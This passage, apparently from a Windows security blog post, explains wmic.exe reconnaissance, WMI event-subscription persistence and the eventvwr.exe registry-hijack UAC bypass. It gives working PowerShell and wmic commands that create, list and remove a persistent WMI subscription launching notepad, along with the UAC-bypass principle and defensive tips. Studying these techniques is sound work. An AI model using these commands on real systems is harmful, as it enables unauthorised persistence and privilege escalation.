Detection\u003C\u002Fh2>\u003Ch3>1. Check TotalPhysicalMemory and NumberOfLogicalProcessors\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_ComputerSystem GET NumberOfLogicalProcessors,TotalPhysicalMemory \u002FFORMAT:list\u003C\u002Fp>\u003Cp>The returned result is as shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019881652_9_a927c50e8a-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Check current processes\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\CIMV2\" PATH Win32_Process GET Caption \u002FFORMAT:list\u003C\u002Fp>\u003Ch2>0x05 WMI Persistence\u003C\u002Fh2>\u003Cp>The complete PowerShell implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$filterName = 'BotFilter82'\u003Cbr>$consumerName = 'BotConsumer23'\u003Cbr>$exePath = 'C:\\Windows\\System32\\notepad.exe'\u003Cbr>$Query = \"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003Cbr>$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace \"root\\subscription\" -Arguments @{Name=$filterName;EventNameSpace=\"root\\cimv2\";QueryLanguage=\"WQL\";Query=$Query} -ErrorAction Stop\u003Cbr>$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace \"root\\subscription\" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}\u003Cbr>Set-WmiInstance -Class __FilterToConsumerBinding -Namespace \"root\\subscription\" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Next, the corresponding WMIC invocation process is introduced step by step\u003C\u002Fp>\u003Ch3>1. Create an __EventFilter instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter CREATE Name=\"BotFilter82\", EventNameSpace=\"root\\cimv2\",QueryLanguage=\"WQL\", Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'\"\u003C\u002Fp>\u003Ch3>2. Create an __EventConsumer instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer CREATE Name=\"BotConsumer23\", ExecutablePath=\"C:\\Windows\\System32\\notepad.exe\",CommandLineTemplate=\"C:\\Windows\\System32\\notepad.exe\"\u003C\u002Fp>\u003Ch3>3. Create a __FilterToConsumerBinding instance\u003C\u002Fh3>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding CREATE Filter=\"__EventFilter.Name=\\\"BotFilter82\\\"\", Consumer=\"CommandLineEventConsumer.Name=\\\"BotConsumer23\\\"\"\u003C\u002Fp>\u003Ch3>4. List the __EventFilter and __EventConsumer instances\u003C\u002Fh3>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding GET __RELPATH \u002FFORMAT:list\u003C\u002Fp>\u003Cp>Code viewed via PowerShell:\u003C\u002Fp>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventFilter\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventConsumer\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding\u003C\u002Fp>\u003Ch3>5. Remove all instances\u003C\u002Fh3>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __EventFilter WHERE Name=\"BotFilter82\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH CommandLineEventConsumer WHERE Name=\"BotConsumer23\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>wmic \u002FNAMESPACE:\"\\\\root\\subscription\" PATH __FilterToConsumerBinding WHERE Filter=\"__EventFilter.Name='BotFilter82'\" DELETE\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>In wmic Binding's Filter parameter \"BotFilter82\", the \" must be changed to '\u003C\u002Fp>\u003Cp>Implementation code for cleanup via PowerShell:\u003C\u002Fp>\u003Cp>\u003Cstrong>Filters:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __EventFilter -Filter \"Name='BotFilter82'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Consumers:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class CommandLineEventConsumer -Filter \"Name='BotConsumer23'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Cp>\u003Cstrong>Event Bindings:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Get-WMIObject -Namespace root\\Subscription -Class __FilterToConsumerBinding -Filter \"__Path LIKE '%BotFilter82%'\" | Remove-WmiObject -Verbose\u003C\u002Fp>\u003Ch2>0x05 fileless UAC bypass using eventvwr.exe and registry hijacking\u003C\u002Fh2>\u003Cp>Some wmic operations require administrator privileges, here's a recently learned UAC bypass technique\u003C\u002Fp>\u003Cp>\u003Cstrong>fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>\u003Cstrong>Learning link:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fenigma0x3.net\u002F2016\u002F08\u002F15\u002Ffileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\u002F\u003C\u002Fp>\u003Cp>\u003Cstrong>Author:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Matt Nelson @enigma0x3\u003C\u002Fp>\u003Ch3>Principle\u003C\u002Fh3>\u003Cp>When the process eventvwr.exe starts, it first looks for the registry location HKCU\\Software\\Classes\\mscfile\\shell\\open\\command. If this location is empty, it then looks for the registry location HKCR\\mscfile\\shell\\open\\command (whose default value is %SystemRoot%\\system32\\mmc.exe \"%1\" %*), launches mmc.exe with high privileges, and finally opens eventvwr.msc.\u003C\u002Fp>\u003Cp>As shown in the figure\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019885508_10_13ecb422b5-1.jpeg\">\u003C\u002Fp>\u003Cp>Next, if a payload is added to the registry HKCU\\Software\\Classes\\mscfile\\shell\\open\\command, the preset payload can be executed before launching mmc.exe.\u003C\u002Fp>\u003Cp>\u003Cstrong>The most important point:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Modifying the key value of the registry HKCU\\Software\\Classes\\mscfile\\shell\\open\\command only requires standard user permissions.\u003C\u002Fp>\u003Ch3>Implementation\u003C\u002Fh3>\u003Cp>The author shared a PoC code implemented via PowerShell, with the link below:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fenigma0x3\u002FMisc-PowerShell-Stuff\u002Fblob\u002Fmaster\u002FInvoke-EventVwrBypass.ps1\u003C\u002Fp>\u003Cp>If the PoC executes successfully, it will write \"Is Elevated: True\" under C:\\UACBypassTest.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>By default, operations on files in the c:\\ directory will be blocked by UAC.\u003C\u002Fp>\u003Cp>I forked the author's code and made slight modifications, running the following command:\u003C\u002Fp>\u003Cp>C:\\Windows\\System32\\cmd.exe \u002Fc copy c:\\test\\1.txt c:\\1.txt\u003C\u002Fp>\u003Cp>Address:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Ch3>Advantages\u003C\u002Fh3>\u003Cp>This method differs significantly from conventional approaches, with the following advantages:\u003C\u002Fp>\u003Cul>\u003Cli>Fileless\u003C\u002Fli>\u003Cli>No process injection required\u003C\u002Fli>\u003Cli>No need to copy privileged files\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Applicable Environments\u003C\u002Fh3>\u003Cp>Windows 7\u003C\u002Fp>\u003Cp>Windows 8.1\u003C\u002Fp>\u003Cp>Windows 10\u003C\u002Fp>\u003Ch3>Defense\u003C\u002Fh3>\u003Cul>\u003Cli>set the UAC level to \"Always Notify\"\u003C\u002Fli>\u003Cli>remove the current user from the Local Administrators group\u003C\u002Fli>\u003Cli>alert on new registry entries in HKCU\\Software\\Classes\\\u003C\u002Fli>\u003C\u002Ful>\u003C\u002Fbody>\u003C\u002Fhtml>",1602,"Onedaysec",5,"published","2026-02-02T08:19:47.663Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"WMI Persistence Techniques Using wmic.exe for System Security","WMI persistence, wmic.exe, Windows Management Instrumentation, registry operations, system security, attack techniques, information gathering, PowerShell, cmd commands",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,4,47],156,155,154,152,{"title":39,"description":39,"image":39},"2026-07-24T15:37:15.062Z","2026-07-23T16:01:05.298Z","draft","2026-07-23T16:04:03.308Z"]